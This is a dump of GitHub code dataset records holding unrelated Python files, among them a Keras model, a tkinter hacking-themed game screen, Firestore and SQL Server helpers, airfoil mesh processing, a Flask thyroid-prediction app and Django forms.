StandardScaler()\n scaler.fit(features_)\n features = scaler.transform(features_)\n nfeatures = np.shape(features)[1]\n categories = np_utils.to_categorical(categories_, num_classes=3)\n\n print('Compiling Model ... 
')\n model = Sequential()\n model.add(Dense(20, input_dim=nfeatures))\n model.add(Activation('relu'))\n #model.add(Dropout(0.4))\n #model.add(Dense(10, kernel_initializer='he'))\n model.add(Dense(15))\n model.add(Activation('relu'))\n #model.add(Dropout(0.4))\n #model.add(Dense(5, kernel_initializer='he'))\n model.add(Dense(10))\n model.add(Activation('relu'))\n #model.add(Dropout(0.4))\n #model.add(Dense(3, kernel_initializer='he'))\n model.add(Dense(3))\n model.add(Activation('softmax'))\n adam = Adam(lr=0.005)\n model.compile(loss=\"categorical_crossentropy\", optimizer=adam, metrics=['accuracy'])\n\n model.fit(features, categories, epochs=200, batch_size=200, shuffle = True, validation_split=0.5)\n\n\n\n\n\n\n","repo_name":"cedricpri/TopPlusDMRunIILegacy","sub_path":"neuralNetwork/alternativeTensorFlow/ML.py","file_name":"ML.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25962133030","text":"from tkinter import *\nfrom datetime import datetime\nimport textwrap\n\nfrom src.base_gui import BaseGUI\nfrom src.bubble_start import BotBubble\n\n\nclass ChatScreen2(BaseGUI):\n def __init__(self, master, controller):\n super(ChatScreen2,self).__init__(master,controller)\n self.canvas = Canvas(self, width=500, height=500, bg=\"white\")\n self.canvas.grid(row=0)\n self.bubbles = []\n Button(self, text=\"SHOW INSTRUCTIONS\", command=self.instructions).grid(row=1, column=0)\n Button(self, text=\"NEXT SCREEN\", command=self.next_screen).grid(row=1, column=1)\n\n # This probably needs updating\n def instructions(self):\n messages = [\"We're in! Now we move on to the next phase of our hacking operation!\",\n \"Wouldn't it be funny if we could access this person's facebook account to make a silly post.\",\n \"On the next screen you will see the desktop: Click to open facebook and then attempt to login using the same credentials as before.\",\n \"If we can't get in we will have to try and trick the person into giving us our data! With a phishing attack to their emails.\"]\n for i, msg in enumerate(messages):\n self.canvas.move(ALL, 0, -110)\n a = BotBubble(self.master,self.controller, self.canvas, msg)\n self.bubbles.append(a)\n\n def next_screen(self):\n self.controller.switch_frame(\"image\")\n","repo_name":"AnnaClee/htm2020","sub_path":"src/bubble_second.py","file_name":"bubble_second.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36296255041","text":"import firebase_admin\nfrom firebase_admin import credentials, firestore\nfrom google.cloud.firestore_v1 import Client\n\nfrom utils import *\n\n\n@log_time\ndef connect_db(service_account, project_id):\n try:\n logger.info(\n f\"connect firestore via service key certification - {service_account}\"\n )\n # Use a service account\n cred = credentials.Certificate(service_account)\n firebase_admin.initialize_app(cred)\n except FileNotFoundError:\n logger.info(\n f\"service key certification file not found. 
use project id - {project_id}\"\n )\n # Use the application default credentials\n cred = credentials.ApplicationDefault()\n firebase_admin.initialize_app(cred, {\"projectId\": project_id, })\n finally:\n client: Client = firestore.client()\n logger.info(\"firestore connected\")\n\n return client\n\n\nclient = connect_db(Config.SERVICE_ACCOUNT, Config.PROJECT_ID)\n","repo_name":"14hy/hanyang-chatbot","sub_path":"server/db/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"28657537234","text":"#!/usr/bin/python3\nimport os, argparse, difflib\n\nlookup = {\n \"flare-form-field\": \"viur-form-bone\",\n \"flare-form-submit\": \"viur-form-submit\",\n \"flare-form\": \"viur-form\",\n\n \"boneField\": \"ViurFormBone\",\n \"sendForm\": \"ViurFormSubmit\",\n \"viurForm\": \"ViurForm\",\n\n \"boneSelector\": \"BoneSelector\",\n \"moduleWidgetSelector\": \"ModuleWidgetSelector\",\n \"displayDelegateSelector\": \"DisplayDelegateSelector\",\n\n \"from flare.forms.formtags import\": \"from flare.viur import\",\n \"from flare.forms\": \"from flare.viur\",\n}\n\nif __name__ == \"__main__\":\n # Get arguments\n ap = argparse.ArgumentParser(\n description=\"Flare source code porting tool\"\n )\n\n ap.add_argument(\n \"project_root\",\n type=str,\n help=\"Flare project root\"\n )\n\n ap.add_argument(\n \"-d\", \"--dryrun\",\n action=\"store_true\",\n help=\"Dry-run for testing, don't modify files\"\n )\n ap.add_argument(\n \"-x\", \"--daredevil\",\n action=\"store_true\",\n help=\"Don't make backups of files, just replace and deal with it\"\n )\n\n args = ap.parse_args()\n\n # Iterate all files in current folder\n for root, dirs, files in os.walk(args.project_root):\n # Ignore ViUR library folders\n if any(ignore in root for ignore in [\"flare\"]):\n continue\n\n for filename in files:\n # Ignore anything without a .py-extension\n ext = os.path.splitext(filename)[1].lower()[1:]\n if ext not in [\"py\"]:\n continue\n\n filename = os.path.join(root, filename)\n\n with open(filename, \"r\") as f:\n original_content = content = f.read()\n\n count = 0\n for k, v in lookup.items():\n if k in content:\n content = content.replace(k, v)\n count += 1\n\n if count:\n if not args.dryrun:\n if not args.daredevil:\n os.rename(filename, filename + \".bak\")\n\n with open(filename, \"w\") as f:\n f.write(content)\n\n print(\"Modified %r\" % filename)\n else:\n print(\n \"\\n\".join(\n difflib.unified_diff(\n original_content.splitlines(),\n content.splitlines(),\n filename,\n filename\n )\n )\n )\n","repo_name":"viur-framework/flare","sub_path":"tools/flare-update.py","file_name":"flare-update.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"61"} +{"seq_id":"40412546719","text":"# THEME_COLOR = \"#375362\"\nTHEME_COLOR = \"#50BAA0\"\nPADDING = 20\nWINDOW_HEIGHT = 10\nWINDOW_WIDTH = 20\nFONT = \"Arial\"\nFONT_SIZE = 15\nFONT_SIZE_L =25\nSM_FONT_SIZE = 10\nLABEL_FONT_SIZE = 15\nFONT_STYLE = \"bold\"\nWHITE = \"white\"\nBTN_COLOR=\"#FA7B52\"\n\nLEFT='w'\nRIGHT = \"e\"\nWINDOW_SIZE = \"600x400\"\nWINDOW_SIZE_L = \"800x400\"\n\n\n#home buttons\nHOME_BTN_HEIGHT = 5\nHOME_BTN_WIDTH = 8\nHOME_BTN_FONT_SIZE = 10\nHOME_BTN_COLOR = '#eab676'\n\n#VAULT BTN WIDTH\nVAULT_BTN_WIDTH = 12\n\n#LOGIN PAGE\nEMAIL_ENTRY_WIDTH = 35\nKEY_ENTRY_WIDTH = 
21","repo_name":"manishjoshieng/KeyManager","sub_path":"src/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74179114434","text":"import logging\nfrom functools import wraps\nfrom typing import (Any,\n Optional,\n Callable,\n Coroutine,\n Dict,\n Tuple,\n List)\n\nfrom asyncpg import PostgresError\nfrom pymysql import Error\nfrom sqlalchemy.engine.url import URL\n\nMYSQL_DRIVER_NAME_PREFIX = 'mysql'\n# to make pagination without limit\nMYSQL_MAX_BIGINT_VALUE = 18_446_744_073_709_551_615\n\nlogger = logging.getLogger(__name__)\n\n\ndef handle_exceptions(function: Callable[..., Coroutine]\n ) -> Callable[..., Coroutine]:\n @wraps(function)\n async def decorated(query: str,\n *args: Tuple[Any, ...],\n **kwargs: Dict[str, Any]):\n try:\n res = await function(query, *args, **kwargs)\n return res\n except (Error, PostgresError) as err:\n err_msg = ('Error while processing '\n f'query: \"{query}\".')\n raise IOError(err_msg) from err\n\n return decorated\n\n\ndef is_db_uri_mysql(db_uri: URL) -> bool:\n backend_name = db_uri.get_backend_name()\n return backend_name == MYSQL_DRIVER_NAME_PREFIX\n\n\ndef normalize_pagination(\n *, limit: Optional[int],\n offset: Optional[int],\n is_mysql: bool) -> Tuple[Optional[int], Optional[int]]:\n if is_mysql:\n if limit is None and offset is not None:\n warn_msg = ('Incorrect pagination parameters: '\n 'in MySQL \"offset\" parameter '\n 'should be specified '\n 'along with \"limit\" parameter, '\n 'but \"limit\" parameter '\n f'has value \"{limit}\". '\n f'Assuming that table\\'s primary key '\n f'has \"BIGINT\" type '\n f'and setting limit '\n f'to {MYSQL_MAX_BIGINT_VALUE}.')\n logger.warning(warn_msg)\n return MYSQL_MAX_BIGINT_VALUE, offset\n return limit, offset\n\n\ndef generate_table_columns_names(\n *,\n columns_names: List[str],\n columns_aliases: List[str]) -> List[str]:\n return [f'{column_name} AS {column_alias}'\n for column_name, column_alias in zip(columns_names,\n columns_aliases)]\n\n\ndef generate_table_columns_aliases(\n *,\n columns_names: List[str],\n columns_aliases: Optional[Dict[str, str]] = None) -> List[str]:\n columns_aliases = columns_aliases or {}\n return [\n f'{columns_aliases.get(column_name, column_name)}'\n for column_name in columns_names]\n","repo_name":"lycantropos/cetus","sub_path":"cetus/data_access/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41225661147","text":"import numpy as np\n\n\"\"\"\nThese are fuctions for processing data in the format of structured mesh.\n\"\"\"\ndef concat_zones(zones) -> np.ndarray:\n upper = np.flip(np.concatenate([\n zones[14][:, :-1],\n zones[16][:, :-1],\n zones[18][:, :-1],\n zones[20][:, :-1],\n zones[22],\n ], axis=1), axis=1)\n\n lower = np.flip(np.concatenate([\n np.flip(zones[0].transpose(1, 0, 2, 3),1) [:, :-1],\n zones[1][:, :-1],\n zones[4][:, :-1],\n zones[6][:, :-1],\n zones[8][:, :-1],\n zones[10],\n ], axis=1), axis=0)\n\n inner = np.concatenate([\n upper[:, :-1], \n lower\n ], axis=1)\n\n lower_far = np.flip(np.concatenate([\n zones[2][:, :-1],\n zones[5][:, :-1],\n zones[7][:, :-1],\n zones[9][:, :-1],\n zones[12],\n ], axis=1), axis=0)\n\n upper_far = np.flip(np.concatenate([\n np.flip(zones[3].transpose(1, 0, 2, 3), axis=0)[:, :-1],\n zones[13][:, :-1],\n zones[15][:, :-1],\n zones[17][:, :-1],\n 
zones[19][:, :-1],\n zones[21],\n ], axis=1), axis=1)\n\n outer = np.concatenate([\n upper_far[:, :-1], \n lower_far\n ], axis=1)\n\n Z = np.concatenate([\n inner, outer\n ]) \n\n return Z\n\ndef convert_to_np(data_dir: str, output_dir: str):\n \"\"\"\n Convert the .dat files to numpy ndarrays. Output is of shape (H, W, I, C).\n \"\"\"\n if not os.path.isdir(output_dir):\n os.mkdir(output_dir)\n\n for filename in tqdm(os.listdir(data_dir)):\n if filename.endswith('.dat'):\n path = os.path.join(data_dir, filename)\n with open(path, 'r') as f:\n zones = []\n for line in f:\n if line.startswith('ZONE'):\n settings = {}\n while True:\n line = f.readline().strip()\n if line.startswith(\"DT\"): break\n for pair in line.replace('\\n', '').split(','):\n k, v = pair.split('=')\n settings[k.strip()] = v.strip()\n I, J, K = int(settings['I']), int(settings['J']), int(settings['K'])\n zone = []\n for _ in range(I * J * K):\n zone.append([float(x) for x in f.readline().strip().split(' ')])\n zone = np.array(zone)\n zones.append(zone.reshape(K, J, I, zone.shape[-1]))\n Z = concat_zones(zones)\n aoa = float(settings.get('AUXDATA Common.AngleOfAttack').strip('\"'))\n mach = float(settings.get('AUXDATA Common.ReferenceMachNumber').strip('\"'))\n target = os.path.join(output_dir, filename.replace('deg.dat',f'_{mach}'))\n np.save(target, Z)\n\ndef process_zones(filename: str):\n with open(filename, 'r') as f:\n zones = []\n for line in f:\n if line.startswith('ZONE'):\n settings = {}\n while True:\n line = f.readline().strip()\n if line.startswith(\"DT\"): break\n for pair in line.replace('\\n', '').split(','):\n k, v = pair.split('=')\n settings[k.strip()] = v.strip()\n # I, J, K = int(settings['I']), int(settings['J']), int(settings['K'])\n I, K = int(settings['I']), int(settings['K'])\n\n zone = []\n for _ in range(I * K):\n zone.append([float(x) for x in f.readline().strip().split(' ')])\n zone = np.array(zone)\n zones.append(zone.reshape(K, I, zone.shape[-1]))\n Z = concat_zones(zones)\n aoa = float(settings.get('AUXDATA Common.AngleOfAttack').strip('\"'))\n mach = float(settings.get('AUXDATA Common.ReferenceMachNumber').strip('\"'))\n # np.save(filename.replace('deg.dat',f'_{mach}'), Z)\n return Z, zones\n\ndef generate_mesh(contour, save_path, visualize=False):\n \"\"\"\n This function generates mesh for an airfoil from specified options.\n TODO: add more options and finer control.\n \"\"\"\n import gmsh\n gmsh.initialize()\n gmsh.model.add('new model')\n lc = 0.002\n \n airfoil_points = []\n for point in contour:\n x, y = point\n airfoil_points.append(gmsh.model.geo.add_point(x, y, 0, lc))\n airfoil_points.append(airfoil_points[0])\n \n top = gmsh.model.geo.add_point(0, 10, 0, 500*lc)\n center = gmsh.model.geo.add_point(0, 0, 0, 500*lc)\n bottom = gmsh.model.geo.add_point(0, -10, 0, 500*lc)\n arc = gmsh.model.geo.add_circle_arc(top, center, bottom)\n\n top_right = gmsh.model.geo.add_point(10, 10, 0, 1000*lc)\n bottom_right = gmsh.model.geo.add_point(10, -10, 0, 1000*lc)\n rec = gmsh.model.geo.add_polyline([top, top_right, bottom_right, bottom])\n \n airfoil = gmsh.model.geo.add_spline(airfoil_points)\n \n surface = gmsh.model.geo.add_plane_surface([\n gmsh.model.geo.add_curve_loop([arc, -rec]), # farfield\n gmsh.model.geo.add_curve_loop([airfoil]) \n ])\n gmsh.model.geo.synchronize()\n\n airfoil_tag = gmsh.model.add_physical_group(1, [airfoil])\n gmsh.model.set_physical_name(1, airfoil_tag, 'airfoil')\n farfield_tag = gmsh.model.add_physical_group(1, [arc, -rec])\n gmsh.model.set_physical_name(1, 
farfield_tag, 'farfield')\n surface_tag = gmsh.model.add_physical_group(2, [surface])\n gmsh.model.set_physical_name(2, surface_tag, 'surface')\n\n gmsh.model.mesh.generate(2)\n gmsh.write(save_path)\n\n if visualize:\n gmsh.fltk.run()\n gmsh.finalize()\n\ndef read_dat(file_name):\n profile = []\n with open(file_name, 'r') as f:\n for line in f.readlines():\n if not line.startswith('#'):\n x, y = line.strip().split()\n profile.append((float(x), float(y)))\n return profile\n\n","repo_name":"btx0424/Field-Prediction","sub_path":"utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41029199625","text":"import pickle\nimport torch\nimport numpy as np\n\nmean, std = [], []\nfor name in ['grayscale', 'brighterror', 'angleerror', 'occlude', 'blur', 'biterror']:\n with open(f\"inception_{name}.pkl\", 'rb') as f:\n info = pickle.load(f)\n mean.append(info['mean'][None, :]) \n std.append(info['std'][None, :])\nmean = torch.from_numpy(np.concatenate(mean, axis=0))\nstd = torch.from_numpy(np.concatenate(std, axis=0))\nprint(mean.shape, std.shape)\n","repo_name":"SimKarras/IQA-MetricLearning","sub_path":"src/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14296950779","text":"\"\"\"\n238. Product of Array Except Self\nhttps://leetcode.com/problems/product-of-array-except-self/\n\"\"\"\n\nclass Solution:\n def productExceptSelf(self, nums: List[int]) -> List[int]:\n # Hash map – O(1) space except for result\n # [0] Initialize a result array res = [1] + [0] * (n-1)\n # [1] Left product: Get product of elements to the left of each i: for eac i in range(1,n): res[i] = nums[i-1] * res[i-1]\n # [2] right product: for i in reversed(range(n)): have a product of all elemnts of right\n # p and set res[i] *= p and multiply p by nums[i]\n # O(n) time and O(1) space except for result\n n = len(nums)\n res = [1] + [0] * (n-1)\n for i in range(1, n):\n res[i] = nums[i-1] * res[i-1]\n p = 1\n for i in reversed(range(n)):\n res[i] *= p\n p *= nums[i]\n return res\n\n # Hash map\n # [1] Construct 2 arrays that are the products of all elements to the left (and right resp)\n # of the element.\n # [2] for each i multiply these the ith entry of l and r to get the result\n # O(n) time and O(n) space\n n = len(nums)\n l, r = [0]*n, [0] *n\n l[0] = 1\n p = 1\n for i in range(1, n):\n p *= nums[i-1]\n l[i] = p\n p = 1\n for i in range(n-1, 0, -1):\n r[i] = p\n p *= nums[i]\n r[0] = p\n return [l[i] * r[i] for i in range(n)]\n","repo_name":"mathvolcano/leetcode","sub_path":"0238_productExceptSelf.py","file_name":"0238_productExceptSelf.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34739925889","text":"from common.utilities.sql import sql_execute_with_parameters, sql_execute\nfrom geoprocessing.data_access.data_access_utilities import insert_clean_up_string\n\n__author__ = 'erezrubinstein'\n\n\n\ndef insert_company_competition(competitors, database_name = None):\n # create temp table to insert into. 
This speeds up the insert tremendously because the SQL table insert will be done in batch with one transaction\n sql_statements = ['''\nCREATE TABLE #competitive_companies(home_company_id int NOT NULL, away_company_id int NOT NULL, competition_strength float NOT NULL,\ncreated_at datetime NOT NULL, updated_at datetime NOT NULL, assumed_start_date datetime NULL, assumed_end_date datetime NULL)''']\n\n for competitor in competitors:\n\n # create statement. This is compacted into one line on purpose. It seems to finish much faster on large data sets\n # ER - the below statements uses literals instead of parameters so because of an SQL Server parameter limitation\n sql_statements.append('''INSERT INTO #competitive_companies (home_company_id, away_company_id, competition_strength, created_at, updated_at, assumed_start_date, assumed_end_date)\nVALUES (%d, %d, %s, GETUTCDATE(), GETUTCDATE(), '%s', %s);\n''' % (competitor.home_company_id, competitor.away_company_id, str(competitor.competition_strength), competitor.start_date, insert_clean_up_string(competitor.end_date)))\n\n\n # add insert into real table statements (from temp table).\n # skip any record that has an active duplicate\n sql_statements.append('''\ninsert into competitive_companies (home_company_id, away_company_id, competition_strength, created_at, updated_at, assumed_start_date, assumed_end_date)\nselect temp_cc.home_company_id, temp_cc.away_company_id, temp_cc.competition_strength, temp_cc.created_at, temp_cc.updated_at, temp_cc.assumed_start_date, temp_cc.assumed_end_date\nfrom #competitive_companies temp_cc\nleft join competitive_companies cc on cc.home_company_id = temp_cc.home_company_id and cc.away_company_id = temp_cc.away_company_id\n and cc.competition_strength = temp_cc.competition_strength and cc.assumed_end_date is null\nwhere cc.home_company_id is null''')\n\n # add drop temp table statement\n sql_statements.append(\"drop table #competitive_companies\")\n\n # join statements and execute\n big_statement = '; '.join(sql_statements)\n sql_execute(big_statement, database_name = database_name)\n\n\ndef select_all_open_competitive_companies_ids_for_company(company_id):\n statement = '''\n SELECT\n away_company_id\n FROM competitive_companies\n WHERE home_company_id = %d AND assumed_end_date is null''' % company_id\n\n rows = sql_execute(statement)\n competitive_company_ids = [row.away_company_id for row in rows]\n return competitive_company_ids\n\n\ndef close_old_company_competitors(away_company_ids, home_company_id, assumed_end_date):\n for competitor_id in away_company_ids:\n statement = \"UPDATE competitive_companies SET assumed_end_date = ? WHERE home_company_id = ? 
AND away_company_id = ?\"\n parameters = [assumed_end_date, home_company_id, competitor_id]\n sql_execute_with_parameters(parameters, statement)","repo_name":"erezrubinstein/aa","sub_path":"gp/data_access/company_competition_handler.py","file_name":"company_competition_handler.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27263331753","text":"import sys\n\nseqLen = int(sys.stdin.readline())\nseqList = list(map(int, sys.stdin.readline().split()))\n\ndef countLen(seqList):\n # 증가, 감소 각각 저장하는 리스트를 따로 만든다.\n # 증가하는 수열의 길이 저장하는 리스트\n incCnt = [1]\n # 감소하는 수열의 길이 저장하는 리스트\n decCnt = [1]\n for i in range(1, len(seqList)):\n # 이전 것이 지금 것보다 작기만 하면,\n # 증가하는 수열의 길이만 늘리고, 감소는 1로 초기화\n if seqList[i]seqList[i-1]:\n incCnt.append(incCnt[-1]+1)\n decCnt.append(1)\n # 서로 같으면 둘다 늘리기\n else:\n decCnt.append(decCnt[-1]+1)\n incCnt.append(incCnt[-1]+1)\n return max(max(incCnt), max(decCnt))\n\nprint(countLen(seqList))","repo_name":"elice-02-study-01-algorithm/python","sub_path":"CJ_Kim/season1/baekjoon/04/2491_수열.py","file_name":"2491_수열.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"7399118284","text":"from flask import Flask, request, render_template\r\nfrom flask import Response\r\nimport os\r\nfrom flask_cors import CORS, cross_origin\r\n\r\nfrom prediction_Validation_Insertion import PredictionValidation\r\nfrom trainingModel import TrainModel\r\nfrom training_Validation_Insertion import TrainValidation\r\n# import flask_monitoringdashboard as dashboard\r\nfrom predictFromModel import Prediction\r\n\r\n\r\nos.putenv('LANG', 'en_US.UTF-8')\r\nos.putenv('LC_ALL', 'en_US.UTF-8')\r\n\r\napp = Flask(__name__)\r\n# dashboard.bind(app)\r\nCORS(app)\r\n\r\n\r\n@app.route(\"/\", methods=['GET'])\r\n@cross_origin()\r\ndef home():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route(\"/predict\", methods=['POST'])\r\n@cross_origin()\r\ndef predictRouteClient():\r\n try:\r\n if request.json is not None:\r\n path = request.json['filepath']\r\n # Object Initialization\r\n predict_val = PredictionValidation(path)\r\n # Calling the prediction_validation function\r\n predict_val.prediction_validation()\r\n # Object Initialization\r\n pred = Prediction(path)\r\n # Predicting for dataset present in database\r\n path = pred.predictionFromModel()\r\n return Response(\"Prediction File created at %s!!!\" % path)\r\n elif request.form is not None:\r\n path = request.form['filepath']\r\n # Object Initialization\r\n predict_val = PredictionValidation(path)\r\n # Calling the prediction_validation function\r\n predict_val.prediction_validation()\r\n # Object Initialization\r\n pred = Prediction(path)\r\n # Predicting for dataset present in database\r\n path = pred.predictionFromModel()\r\n return Response(\"Prediction File created at %s!!!\" % path)\r\n\r\n except ValueError:\r\n print(\"Error Occurred! \" + str(ValueError))\r\n return Response(\"Error Occurred! %s\" % str(ValueError))\r\n except KeyError:\r\n print(\"Error Occurred! \" + str(KeyError))\r\n return Response(\"Error Occurred! %s\" % KeyError)\r\n except Exception as e:\r\n print(\"Error Occurred! \" + str(e))\r\n return Response(\"Error Occurred! 
%s\" % e)\r\n\r\n\r\n@app.route(\"/train\", methods=['POST'])\r\n@cross_origin()\r\ndef trainRouteClient():\r\n\r\n try:\r\n if request.json['folderPath'] is not None:\r\n path = request.json['folderPath']\r\n # Object Initialization\r\n train_valObj = TrainValidation(path)\r\n # Calling the training_validation function\r\n train_valObj.train_validation()\r\n # Object Initialization\r\n trainModelObj = TrainModel()\r\n # Training the Model for the files in the table\r\n trainModelObj.trainingModel()\r\n\r\n except ValueError:\r\n\r\n return Response(\"Error Occurred! %s\" % ValueError)\r\n\r\n except KeyError:\r\n\r\n return Response(\"Error Occurred! %s\" % KeyError)\r\n\r\n except Exception as e:\r\n\r\n return Response(\"Error Occurred! %s\" % e)\r\n return Response(\"Training successful!!\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","repo_name":"sandeepyadav10011995/Thyroid-Detection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"13477130179","text":"import os, sys\n\nimport datetime\n\nfrom django.http import HttpResponsePermanentRedirect, HttpResponseForbidden\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n\nfrom django.views.generic.simple import *\nfrom django.views.generic.list_detail import *\nfrom django.views.generic.create_update import *\n\nfrom webapps.generic.views import *\nfrom webapps.generic.models import *\nfrom webapps.generic.errors import *\nfrom webapps.sbinfo.models import *\n\nVALID_FACTORS = [\n 'student'\n]\n\nADMIN_FACTORS = [\n 'appointments'\n]\n\ndef index(request):\n authenticate(request, VALID_FACTORS)\n \n return render_to_response('sbinfo/index.phtml',context_instance=RequestContext(request))\n\ndef sbinfo_submit(request):\n authenticate(request, VALID_FACTORS)\n \n if request.method == 'POST':\n if sbinfoentry_id == '':\n entry = SBInfoEntry()\n else:\n entry = SBInfoEntry.objects.get(id = sbinfoentry_id)\n \n post = request.POST\n \n entry.contact = request.user\n entry.title = post['title']\n entry.message = post['message']\n entry.save()\n\n template_args = {\n 'user' : request.user,\n 'entry' : entry,\n }\n \n return render_to_response('sbinfo/submit.phtml',template_args,context_instance=RequestContext(request))\n\n else:\n entry = SBInfoEntry()\n template_args = {\n 'user' : request.user,\n 'entry' : entry,\n }\n\n return render_to_response('sbinfo/submit.phtml',template_args,context_instance=RequestContext(request))\n\ndef sbinfo_list(request):\n authenticate(request, VALID_FACTORS)\n","repo_name":"ReedSIN/webapps","sub_path":"sbinfo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27480622015","text":"from django import forms\nfrom django.forms.models import BaseModelFormSet\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.exceptions import ValidationError\n\nfrom .models import (\n Officials, Club, PlayerInfo, JerseyPicture, ProfilePicture,\n AgeProof, AddressProof, Invitations, ClubDetails, Grounds\n)\n\nfrom myapp.widgets import ImageInput\n\n\nclass SignUpFormClub(UserCreationForm):\n\n club_name = forms.CharField(\n label='Name of the Club', max_length=100, required=True)\n\n address 
= forms.CharField(\n label='Address of the Club', max_length=200, required=True,\n widget=forms.Textarea)\n\n contact_number = forms.CharField(\n label='Contact number', max_length=10, min_length=10, required=True)\n\n class Meta:\n model = get_user_model()\n fields = ('username', 'club_name', 'address', 'email',\n 'contact_number', 'password1', 'password2')\n\n\nclass SignUpFormPersonal(UserCreationForm):\n class Meta:\n model = get_user_model()\n fields = ('username', 'email', 'password1', 'password2')\n\n\nclass dpFormSet(BaseModelFormSet):\n def __init__(self, *args, **kwargs):\n clubid = kwargs.pop('clubid', None)\n super().__init__(*args, **kwargs)\n if clubid is None:\n qs = ProfilePicture.objects.filter(checked=False)\n else:\n qs = ProfilePicture.objects.filter(\n user__club__pk=clubid).filter(checked=False)\n\n qs1 = qs.order_by('pk')\n self.queryset = qs1[:10]\n\n\nclass dpUploadForm(forms.ModelForm):\n class Meta:\n model = ProfilePicture\n fields = ['image', ]\n widgets = {\n 'image': ImageInput()\n }\n\n\nclass dpEditForm(forms.ModelForm):\n xp1 = forms.DecimalField(min_value=0., max_value=1., localize=False,\n widget=forms.HiddenInput, initial=0)\n xp2 = forms.DecimalField(min_value=0., max_value=1., localize=False,\n widget=forms.HiddenInput, initial=0)\n yp1 = forms.DecimalField(min_value=0., max_value=1., localize=False,\n widget=forms.HiddenInput, initial=0)\n yp2 = forms.DecimalField(min_value=0., max_value=1., localize=False,\n widget=forms.HiddenInput, initial=0)\n\n class Meta:\n model = ProfilePicture\n fields = ['checked', ]\n widgets = {\n 'checked': forms.HiddenInput(),\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if self.instance.image:\n xp1, yp1, xp2, yp2 = self.instance.get_cropbox_frac()\n self.fields['xp1'].initial = xp1\n self.fields['xp2'].initial = xp2\n self.fields['yp1'].initial = yp1\n self.fields['yp2'].initial = yp2\n\n def save(self, commit=True):\n obj = super().save(commit=False)\n data = self.cleaned_data\n xp1, yp1, xp2, yp2 = self.instance.get_cropbox_frac()\n xp1, yp1 = data.get('xp1', xp1), data.get('yp1', yp1)\n xp2, yp2 = data.get('xp2', xp2), data.get('yp2', yp2)\n if xp1 >= xp2 or yp1 >= yp2:\n raise ValidationError(\"Incorrect Cropbox\")\n obj.set_cropbox_frac(xp1, yp1, xp2, yp2)\n if commit:\n obj.save()\n return obj\n\n\nclass ProfilePictureForm(forms.ModelForm):\n class Meta:\n model = ProfilePicture\n fields = ['image', 'x1', 'x2', 'y1', 'y2']\n\n widgets = {\n # 'image': ImageWidget(),\n 'x1': forms.HiddenInput(),\n 'x2': forms.HiddenInput(),\n 'y1': forms.HiddenInput(),\n 'y2': forms.HiddenInput(),\n }\n\n\nclass AgeProofForm(forms.ModelForm):\n class Meta:\n model = AgeProof\n fields = ['image', 'x1', 'x2', 'y1', 'y2']\n\n widgets = {\n # 'image': ImageWidget(),\n 'x1': forms.HiddenInput(),\n 'x2': forms.HiddenInput(),\n 'y1': forms.HiddenInput(),\n 'y2': forms.HiddenInput(),\n }\n\n\nclass AddressProofForm(forms.ModelForm):\n class Meta:\n model = AddressProof\n fields = ['image', 'x1', 'x2', 'y1', 'y2']\n\n widgets = {\n # 'image': ImageWidget(),\n 'x1': forms.HiddenInput(),\n 'x2': forms.HiddenInput(),\n 'y1': forms.HiddenInput(),\n 'y2': forms.HiddenInput(),\n }\n\n\nclass JerseyForm(forms.ModelForm):\n class Meta:\n model = JerseyPicture\n fields = ['image', 'x1', 'x2', 'y1', 'y2']\n\n widgets = {\n 'x1': forms.HiddenInput(),\n 'x2': forms.HiddenInput(),\n 'y1': forms.HiddenInput(),\n 'y2': forms.HiddenInput(),\n }\n\n\nclass OfficialsEditForm(forms.ModelForm):\n class Meta:\n model = 
